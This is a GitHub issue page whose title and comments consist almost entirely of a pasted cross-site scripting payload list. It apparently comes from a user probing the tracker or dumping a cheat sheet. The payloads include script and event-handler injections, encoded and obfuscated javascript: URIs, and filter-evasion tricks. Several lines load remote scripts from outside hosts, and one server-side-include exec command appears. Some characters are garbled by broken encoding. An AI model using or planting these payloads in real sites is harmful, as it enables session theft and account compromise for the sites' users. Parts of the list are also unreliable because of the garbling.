Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

'"><img src=x onerror=prompt(1)>https://html5sec.org/test.svg #474

Closed
nullr3x opened this issue Dec 25, 2017 · 83 comments
Closed

'"><img src=x onerror=prompt(1)>https://html5sec.org/test.svg #474

nullr3x opened this issue Dec 25, 2017 · 83 comments

Comments

@nullr3x
Copy link

nullr3x commented Dec 25, 2017

'">

@nullr3x
Copy link
Author

nullr3x commented Dec 25, 2017

<script>alert(1)</script>

@nullr3x
Copy link
Author

nullr3x commented Dec 25, 2017

<script>alert(123);</script> <ScRipT>alert("XSS");</ScRipT> <script>alert(123)</script> <script>alert("hellox worldss");</script> <script>alert(�XSS�)</script> <script>alert(�XSS�);</script> <script>alert(�XSS�)</script>

�><script>alert(�XSS�)</script>

<script>alert(/XSS�)</script> <script>alert(/XSS/)</script>

</script><script>alert(1)</script>
�; alert(1);
�)alert(1);//

<ScRiPt>alert(1)</sCriPt>

<iframe %00 src=" javascript:prompt(1) "%00>

<style>{font-family:'<iframe/onload=confirm(1)>'

<input/onmouseover="javaSCRIPT:confirm(1)"

<scRipt %00>alert(1) {Opera}

<img/src=%00 onerror=this.onerror=confirm(1)

<img src=%00 onerror=alert(1)

<script/ src='https://dl.dropbox.com/u/13018058/js.js' / ></script>

<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? &lt;script /*%00*/>/*%00*/alert(1)/*%00*/&lt;/script /*%00*/ &#34;&#62;<h1/onmouseover='\u0061lert(1)'>%00 <iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>"> <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/> <svg>&lt;script xlink:href=data&colon;,window.open('https://www.google.com/')>&lt;/script <svg>&lt;script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} <meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> &lt;iframe src=javascript&colon;alert&lpar;document&period;location&rpar;> <form><a href="javascript:\u0061lert&#x28;1&#x29;">X &lt;/script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'> <p>&lt;img/ � src=<code>~</code> onerror=prompt(1)&gt;</p> <form>&lt;iframe &#9;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#9;;> <p>&lt;a href=&quot;data:application/x-x509-user-cert; base64 ,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==&quot; �&gt;X&lt;/a</p> <p><a href="http://www.google">http://www.google</a>&lt;script .com&gt;alert(document.location)&lt;/script</p> <p>&lt;a href=[�]&quot;� onmouseover=prompt(1)//&quot;&gt;XYZ&lt;/a</p> <p>&lt;img/src=@ onerror = prompt('1')</p> <p>&lt;style/onload=prompt('XSS')</p> &lt;script ^__^>alert(String.fromCharCode(49))&lt;/script ^__^ &lt;/style &#32;>&lt;script &#32; :-(>/**/alert(document.location)/**/&lt;/script &#32; :-( &#00;</form><input type&#61;"date" onfocus="alert(1)"> <form>&lt;textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'> &lt;script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/&lt;/script /***/ &lt;iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'> <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a> &lt;script ~~~>alert(0%0)&lt;/script ~~~> <style/onload=&lt;!--&#9;&gt;&#10;alert&#10;&lpar;1&rpar;> <///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1) &#34;&#62;<svg>&lt;style>{-o-link-source&colon;'<body/onload=confirm(1)>' &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera} <marquee onstart='javascript:alert&#x28;1&#x29;'>^__^ <div/style="width:expression(confirm(1))">X</div> {IE7} <iframe/%00/ src=javaSCRIPT&colon;alert(1) //<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>// /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> //|\\ &lt;script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ &lt;/script //|\\ </font>/<svg>&lt;style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/&lt;/style> <p>&lt;a/href=&quot;javascript: javascript:prompt(1)&quot;&gt;<input type="X"></p> <p>&lt;/plaintext&gt;&lt;/|&gt;&lt;plaintext/onmouseover=prompt(1)</p> <p></svg>''<svg>&lt;script 'AQuickBrownFoxJumpsOverTheLazyDog'&gt;alert(1) {Opera}</p> <p><a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button></p> <div onmouseover='alert&lpar;1&rpar;'>DIV</div> &lt;iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> <p><a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a></p> <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <p><var onmouseover="prompt(1)">On Mouse Over</var></p> <p><a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a></p> <p>&lt;img src=&quot;/&quot; =_=&quot; title=&quot;onerror='prompt(1)'&quot;&gt;</p> <p>&lt;%<!--'%><script>alert(1);</script --></p> &lt;script src="data:text/javascript,alert(1)">&lt;/script> <p>&lt;iframe/src //onload = prompt(1)</p> <p>&lt;iframe/onreadystatechange=alert(1)</p> <p>&lt;svg/onload=alert(1)</p> <p>&lt;input value=&lt;&gt;&lt;iframe/src=javascript:confirm(1)</p> <p>&lt;input type=&quot;text&quot; value=`` &lt;div/onmouseover='alert(1)'&gt;X</div></p> <p><a href="http://www">http://www</a>.&lt;script>alert(1)&lt;/script .com</p> &lt;iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29>&lt;/iframe> <p><svg>&lt;script ?&gt;alert(1)</p> &lt;iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29>&lt;/iframe> <p>&lt;img src=<code>xx:xx</code>onerror=alert(1)&gt;</p> <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/> <math><a xlink:href="//jsfiddle.net/t846h/">click <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> <svg contentScriptType=text/vbs>&lt;script>MsgBox+1 <p><a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X&lt;/a</p> <p>&lt;iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE&gt;</p> &lt;script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')&lt;/script U+ <script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')">&lt;/script a=\u0061 & /=%2F <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)>&lt;/script <object data=javascript&colon;\u0061&#x6C;&#101%72t(1)> &lt;script>+-+-1-+-+alert(1)&lt;/script> <p>&lt;body/onload=&lt;!--&gt;&amp;#10alert(1)&gt;</p> &lt;script itworksinallbrowsers>/*<script* */alert(1)&lt;/script <img src ?itworksonchrome?\/onerror = alert(1) <svg>&lt;script>//&NewLine;confirm(1);&lt;/script </svg> <svg>&lt;script onlypossibleinopera:-)> alert(1) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe &lt;script x> alert(1) &lt;/script 1=2 <div/onmouseover='alert(1)'> style="x:"> <--`<img/src=` onerror=alert(1)> --!> <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)>&lt;/script> <div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> <p>&quot;&gt;&lt;img src=x onerror=window.open('<a href="https://www.google.com/&#x27;);%3E">https://www.google.com/');&gt;</a></p> <form><button formaction=javascript&colon;alert(1)>CLICKME <p><math><a xlink:href="//jsfiddle.net/t846h/">click</p> <p><object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object></p> &lt;iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E">&lt;/iframe> <p><a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a></p> &lt;SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)&lt;/SCRIPT> <p>�;alert(String.fromCharCode(88,83,83))//�;alert(String.fromCharCode(88,83,83))//�;alert(String.fromCharCode(88,83,83))//�;alert(String.fromCharCode(88,83,83))//�&gt;&lt;/SCRIPT>�&gt;�&gt;&lt;SCRIPT>alert(String.fromCharCode(88,83,83))&lt;/SCRIPT><br /> &lt;IMG ���&gt;&lt;SCRIPT>alert(�XSS�)&lt;/SCRIPT>�&gt;<br /> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))><br /> &lt;IMG SRC=�jav ascript:alert(�XSS�);�&gt;<br /> <IMG SRC=�jav&#x09;ascript:alert(�XSS�);�><br /> &lt;&lt;SCRIPT>alert(�XSS�);//&lt;&lt;/SCRIPT><br /> %253cscript%253ealert(1)%253c/script%253e<br /> �&gt;&lt;s�%2b�cript&gt;alert(document.cookie)&lt;/script><br /> foo&lt;script>alert(1)&lt;/script><br /> &lt;scr&lt;script>ipt&gt;alert(1)&lt;/scr&lt;/script>ipt&gt;<br /> <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;><br /> <IMG SRC=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41><br /> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29></p> <BODY BACKGROUND=�javascript:alert(�XSS�)�> <BODY ONLOAD=alert(�XSS�)> <INPUT TYPE=�IMAGE� SRC=�javascript:alert(�XSS�);�> <IMG SRC=�javascript:alert(�XSS�)� &lt;iframe src=http://ha.ckers.org/scriptlet.html < javascript:alert("hellox worldss") <img src="javascript:alert('XSS');"> <img src=javascript:alert(&quot;XSS&quot;)> <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->&lt;/SCRIPT>">'>&lt;SCRIPT>alert(String.fromCharCode(88,83,83))&lt;/SCRIPT> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> &lt;IFRAME SRC="javascript:alert('XSS');">&lt;/IFRAME> <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> &lt;SCRIPT a=">" SRC="http://ha.ckers.org/xss.js">&lt;/SCRIPT> &lt;SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js">&lt;/SCRIPT> &lt;SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js">&lt;/SCRIPT> &lt;SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js">&lt;/SCRIPT> &lt;SCRIPT>document.write("<SCRI");&lt;/SCRIPT>PT SRC="http://ha.ckers.org/xss.js">&lt;/SCRIPT> <&lt;SCRIPT>alert("XSS");//<&lt;/SCRIPT> <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->&lt;/SCRIPT>">'>&lt;SCRIPT>alert(String.fromCharCode(88,83,83))&lt;/SCRIPT> ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->&lt;/SCRIPT>">'>&lt;SCRIPT>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search &lt;script>alert("hellox worldss")&lt;/script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510 &lt;script>alert("XSS");&lt;/script>&search=1 0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//-->&lt;/SCRIPT>">'>&lt;SCRIPT>alert(String.fromCharCode(88,83%?2C83))&lt;/SCRIPT>&submit-frmGoogleWeb=Web+Search <h1><font color=blue>hellox worldss</h1> <BODY ONLOAD=alert('hellox worldss')> <input onfocus=write(XSS) autofocus> <input onblur=write(XSS) autofocus><input autofocus> <body onscroll=alert(XSS)><br><br><br><br><br><br>...<br><br><br><br><input autofocus> <form><button formaction="javascript:alert(XSS)">lol <!--<img src="--><img src=x onerror=alert(XSS)//"> <![><img src="]><img src=x onerror=alert(XSS)//"> &lt;style><img src="&lt;/style><img src=x onerror=alert(XSS)//"> <? foo=">&lt;script>alert(1)&lt;/script>"> <! foo=">&lt;script>alert(1)&lt;/script>"> </ foo=">&lt;script>alert(1)&lt;/script>"> <? foo="><x foo='?>&lt;script>alert(1)&lt;/script>'>"> <! foo="[[[Inception]]"><x foo="]foo>&lt;script>alert(1)&lt;/script>"> <% foo><x foo="%>&lt;script>alert(123)&lt;/script>"> <div style="font-family:'foo&#10;;color:red;';">LOL LOL&lt;style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}&lt;/style> &lt;script>({0:#0=alert/#0#/#0#(0)})&lt;/script> <svg xmlns="http://www.w3.org/2000/svg">LOL&lt;script>alert(123)&lt;/script></svg> &lt;SCRIPT&gt;alert(/XSS/&#46;source)&lt;/SCRIPT&gt; \\";alert('XSS');// &lt;/TITLE&gt;&lt;SCRIPT&gt;alert(\"XSS\");&lt;/SCRIPT&gt; &lt;INPUT TYPE=\"IMAGE\" SRC=\"javascript&#58;alert('XSS');\"&gt; &lt;BODY BACKGROUND=\"javascript&#58;alert('XSS')\"&gt; &lt;BODY ONLOAD=alert('XSS')&gt; &lt;IMG DYNSRC=\"javascript&#58;alert('XSS')\"&gt; &lt;IMG LOWSRC=\"javascript&#58;alert('XSS')\"&gt; &lt;BGSOUND SRC=\"javascript&#58;alert('XSS');\"&gt; &lt;BR SIZE=\"&{alert('XSS')}\"&gt; &lt;LAYER SRC=\"http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\"&gt;&lt;/LAYER&gt; &lt;LINK REL=\"stylesheet\" HREF=\"javascript&#58;alert('XSS');\"&gt; &lt;LINK REL=\"stylesheet\" HREF=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;css\"&gt; &lt;STYLE&gt;@import'http&#58;//ha&#46;ckers&#46;org/xss&#46;css';&lt;/STYLE&gt; &lt;META HTTP-EQUIV=\"Link\" Content=\"&lt;http&#58;//ha&#46;ckers&#46;org/xss&#46;css&gt;; REL=stylesheet\"&gt; &lt;STYLE&gt;BODY{-moz-binding&#58;url(\"http&#58;//ha&#46;ckers&#46;org/xssmoz&#46;xml#xss\")}&lt;/STYLE&gt; &lt;XSS STYLE=\"behavior&#58; url(xss&#46;htc);\"&gt; &lt;STYLE&gt;li {list-style-image&#58; url(\"javascript&#58;alert('XSS')\");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS &lt;IMG SRC='vbscript&#58;msgbox(\"XSS\")'&gt; &lt;IMG SRC=\"mocha&#58;&#91;code&#93;\"&gt; &lt;IMG SRC=\"livescript&#58;&#91;code&#93;\"&gt; �scriptualert(EXSSE)�/scriptu &lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript&#58;alert('XSS');\"&gt; &lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data&#58;text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\"&gt; &lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http&#58;//;URL=javascript&#58;alert('XSS');\" &lt;IFRAME SRC=\"javascript&#58;alert('XSS');\"&gt;&lt;/IFRAME&gt; &lt;FRAMESET&gt;&lt;FRAME SRC=\"javascript&#58;alert('XSS');\"&gt;&lt;/FRAMESET&gt; &lt;TABLE BACKGROUND=\"javascript&#58;alert('XSS')\"&gt; &lt;TABLE&gt;&lt;TD BACKGROUND=\"javascript&#58;alert('XSS')\"&gt; &lt;DIV STYLE=\"background-image&#58; url(javascript&#58;alert('XSS'))\"&gt; &lt;DIV STYLE=\"background-image&#58;\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028&#46;1027\0058&#46;1053\0053\0027\0029'\0029\"&gt; &lt;DIV STYLE=\"background-image&#58; url(javascript&#58;alert('XSS'))\"&gt; &lt;DIV STYLE=\"width&#58; expression(alert('XSS'));\"&gt; &lt;STYLE&gt;@im\port'\ja\vasc\ript&#58;alert(\"XSS\")';&lt;/STYLE&gt; &lt;IMG STYLE=\"xss&#58;expr/*XSS*/ession(alert('XSS'))\"&gt; &lt;XSS STYLE=\"xss&#58;expression(alert('XSS'))\"&gt; exp/*&lt;A STYLE='no\xss&#58;noxss(\"*//*\"); xss&#58;ex&#x2F;*XSS*//*/*/pression(alert(\"XSS\"))'&gt; &lt;STYLE TYPE=\"text/javascript\"&gt;alert('XSS');&lt;/STYLE&gt; &lt;STYLE&gt;&#46;XSS{background-image&#58;url(\"javascript&#58;alert('XSS')\");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt; &lt;STYLE type=\"text/css\"&gt;BODY{background&#58;url(\"javascript&#58;alert('XSS')\")}&lt;/STYLE&gt; &lt;!--&#91;if gte IE 4&#93;&gt; &lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt; &lt;!&#91;endif&#93;--&gt; &lt;BASE HREF=\"javascript&#58;alert('XSS');//\"&gt; &lt;OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\"&gt;&lt;/OBJECT&gt; &lt;OBJECT classid=clsid&#58;ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript&#58;alert('XSS')&gt;&lt;/OBJECT&gt; &lt;EMBED SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;swf\" AllowScriptAccess=\"always\"&gt;&lt;/EMBED&gt; &lt;EMBED SRC=\"data&#58;image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"&gt;&lt;/EMBED&gt; a=\"get\"; b=\"URL(\\"\"; c=\"javascript&#58;\"; d=\"alert('XSS');\\")\"; eval(a+b+c+d); &lt;HTML xmlns&#58;xss&gt;&lt;?import namespace=\"xss\" implementation=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;htc\"&gt;&lt;xss&#58;xss&gt;XSS&lt;/xss&#58;xss&gt;&lt;/HTML&gt; &lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;!&#91;CDATA&#91;&lt;IMG SRC=\"javas&#93;&#93;&gt;&lt;!&#91;CDATA&#91;cript&#58;alert('XSS');\"&gt;&#93;&#93;&gt; &lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt; &lt;XML ID=\"xss\"&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=\"javas&lt;!-- --&gt;cript&#58;alert('XSS')\"&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt; &lt;SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"&gt;&lt;/SPAN&gt; &lt;XML SRC=\"xsstest&#46;xml\" ID=I&gt;&lt;/XML&gt; &lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt; &lt;HTML&gt;&lt;BODY&gt; &lt;?xml&#58;namespace prefix=\"t\" ns=\"urn&#58;schemas-microsoft-com&#58;time\"&gt; &lt;?import namespace=\"t\" implementation=\"#default#time2\"&gt; &lt;t&#58;set attributeName=\"innerHTML\" to=\"XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;\"&gt; &lt;/BODY&gt;&lt;/HTML&gt; &lt;SCRIPT SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;jpg\"&gt;&lt;/SCRIPT&gt; &lt;!--#exec cmd=\"/bin/echo '&lt;SCR'\"--&gt;&lt;!--#exec cmd=\"/bin/echo 'IPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt;'\"--&gt; &lt;? echo('&lt;SCR)'; echo('IPT&gt;alert(\"XSS\")&lt;/SCRIPT&gt;'); ?&gt; &lt;IMG SRC=\"http&#58;//www&#46;thesiteyouareon&#46;com/somecommand&#46;php?somevariables=maliciouscode\"&gt; Redirect 302 /a&#46;jpg http&#58;//victimsite&#46;com/admin&#46;asp&deleteuser &lt;META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;\"&gt; &lt;HEAD&gt;&lt;META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- &lt;SCRIPT a=\"&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; &lt;SCRIPT =\"&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; &lt;SCRIPT a=\"&gt;\" '' SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; &lt;SCRIPT \"a='&gt;'\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; &lt;SCRIPT a=`&gt;` SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; &lt;SCRIPT a=\"&gt;'&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; &lt;SCRIPT&gt;document&#46;write(\"&lt;SCRI\");&lt;/SCRIPT&gt;PT SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; &lt;A HREF=\"http&#58;//66&#46;102&#46;7&#46;147/\"&gt;XSS&lt;/A&gt; &lt;A HREF=\"http&#58;//%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\"&gt;XSS&lt;/A&gt; &lt;A HREF=\"http&#58;//1113982867/\"&gt;XSS&lt;/A&gt; &lt;A HREF=\"http&#58;//0x42&#46;0x0000066&#46;0x7&#46;0x93/\"&gt;XSS&lt;/A&gt; &lt;A HREF=\"http&#58;//0102&#46;0146&#46;0007&#46;00000223/\"&gt;XSS&lt;/A&gt; &lt;A HREF=\"htt p&#58;//6 6&#46;000146&#46;0x7&#46;147/\"&gt;XSS&lt;/A&gt; &lt;A HREF=\"//www&#46;google&#46;com/\"&gt;XSS&lt;/A&gt; &lt;A HREF=\"//google\"&gt;XSS&lt;/A&gt; &lt;A HREF=\"http&#58;//ha&#46;ckers&#46;org@google\"&gt;XSS&lt;/A&gt; &lt;A HREF=\"http&#58;//google&#58;ha&#46;ckers&#46;org\"&gt;XSS&lt;/A&gt; &lt;A HREF=\"http&#58;//google&#46;com/\"&gt;XSS&lt;/A&gt; &lt;A HREF=\"http&#58;//www&#46;google&#46;com&#46;/\"&gt;XSS&lt;/A&gt; &lt;A HREF=\"javascript&#58;document&#46;location='http&#58;//www&#46;google&#46;com/'\"&gt;XSS&lt;/A&gt; &lt;A HREF=\"http&#58;//www&#46;gohttp&#58;//www&#46;google&#46;com/ogle&#46;com/\"&gt;XSS&lt;/A&gt; &lt; %3C &lt &lt; &LT &LT; &#60 &#60 &#60 &#60 &#60 &#60 &lt; &#x3c &#x03c &#x003c &#x0003c &#x00003c &#x000003c &#x3c; &#x03c; &#x003c; &#x0003c; &#x00003c; &#x000003c; &#X3c &#X03c &#X003c &#X0003c &#X00003c &#X000003c &#X3c; &#X03c; &#X003c; &#X0003c; &#X00003c; &#X000003c; &#x3C &#x03C &#x003C &#x0003C &#x00003C &#x000003C &#x3C; &#x03C; &#x003C; &#x0003C; &#x00003C; &#x000003C; &#X3C &#X03C &#X003C &#X0003C &#X00003C &#X000003C &#X3C; &#X03C; &#X003C; &#X0003C; &#X00003C; &#X000003C; \x3c \x3C \u003c \u003C &lt;iframe src=http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html&gt; &lt;IMG SRC=\"javascript&#58;alert('XSS')\" &lt;SCRIPT SRC=//ha&#46;ckers&#46;org/&#46;js&gt; &lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js?&lt;B&gt; &lt;&lt;SCRIPT&gt;alert(\"XSS\");//&lt;&lt;/SCRIPT&gt; &lt;SCRIPT/SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; &lt;BODY 